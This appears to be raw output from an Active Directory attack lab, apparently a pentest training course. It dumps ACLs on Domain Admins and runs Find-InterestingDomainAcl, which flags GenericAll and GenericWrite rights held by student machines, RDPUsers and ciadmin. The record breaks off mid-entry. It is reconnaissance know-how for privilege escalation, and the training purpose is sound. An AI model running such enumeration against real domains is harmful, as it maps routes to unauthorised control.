ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-561
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server-License-Server
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-561
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Change-Password
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-1-0
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Change-Password
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty, ExtendedRight
ObjectAceType : Private-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : ContainerInherit
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 304
AuditFlags : None
IsInherited : False
AceFlags : ContainerInherit
InheritedObjectAceType : All
OpaqueLength : 0

AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : CreateChild, DeleteChild, Self, WriteProperty, ExtendedRight,
GenericRead, WriteDacl,
WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-335606122-960912869-3279953914-519
AccessMask : 917951
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : CreateChild, DeleteChild, Self, WriteProperty, ExtendedRight,
GenericRead, WriteDacl,
WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-512
AccessMask : 917951
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : CreateChild, DeleteChild, Self, WriteProperty, ExtendedRight, Delete,
GenericRead, WriteDacl,
WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 24
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 983487
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 131220
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-18
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

Getting Interesting Domain ACLs

What are interesting ACEs:

An ACE in which a security Principal has a Write, Modify or Generic All Active directory permissions would
be an interesting ACE.
PS C:\Users\student163> Find-InterestingDomainAcl -ResolveGUIDs

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STDADMIN,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-4202
IdentityReferenceName : DCORP-STDADMIN$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-
STDADMIN,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD161,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13681
IdentityReferenceName : DCORP-STD161$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD161,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD162,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13682
IdentityReferenceName : DCORP-STD162$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD162,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD163,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13683
IdentityReferenceName : DCORP-STD163$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD163,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD164,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13684
IdentityReferenceName : DCORP-STD164$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD164,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD165,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13685
IdentityReferenceName : DCORP-STD165$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD165,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD166,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13686
IdentityReferenceName : DCORP-STD166$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD166,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD168,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13687
IdentityReferenceName : DCORP-STD168$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD168,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD167,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13688
IdentityReferenceName : DCORP-STD167$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD167,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD169,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13689
IdentityReferenceName : DCORP-STD169$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD169,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD170,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13690
IdentityReferenceName : DCORP-STD170$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD170,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD171,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13691
IdentityReferenceName : DCORP-STD171$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD171,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD172,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13692
IdentityReferenceName : DCORP-STD172$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD172,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD173,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13693
IdentityReferenceName : DCORP-STD173$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD173,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD174,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13694
IdentityReferenceName : DCORP-STD174$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD174,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD175,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13695
IdentityReferenceName : DCORP-STD175$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD175,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD176,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13696
IdentityReferenceName : DCORP-STD176$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD176,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD177,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13697
IdentityReferenceName : DCORP-STD177$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD177,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD178,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13698
IdentityReferenceName : DCORP-STD178$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD178,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD180,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13699
IdentityReferenceName : DCORP-STD180$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD180,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual

Machine,CN=DCORP-
STD179,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13700
IdentityReferenceName : DCORP-STD179$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-STD179,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-

ADMINSRV,OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1105
IdentityReferenceName : DCORP-ADMINSRV$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-ADMINSRV,OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1121
IdentityReferenceName : ciadmin
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=ci admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : user

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-

MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1108
IdentityReferenceName : DCORP-MGMT$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-

MSSQL,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1109
IdentityReferenceName : DCORP-MSSQL$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-MSSQL,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-

SQL1,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1110
IdentityReferenceName : DCORP-SQL1$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-SQL1,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-

APPSRV,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1106
IdentityReferenceName : DCORP-APPSRV$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-APPSRV,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Windows Virtual Machine,CN=DCORP-

CI,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1107
IdentityReferenceName : DCORP-CI$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-CI,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Control161User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control162User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control163User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control164User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control165User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control166User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control167User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control168User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control169User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control170User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control171User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control172User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control173User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
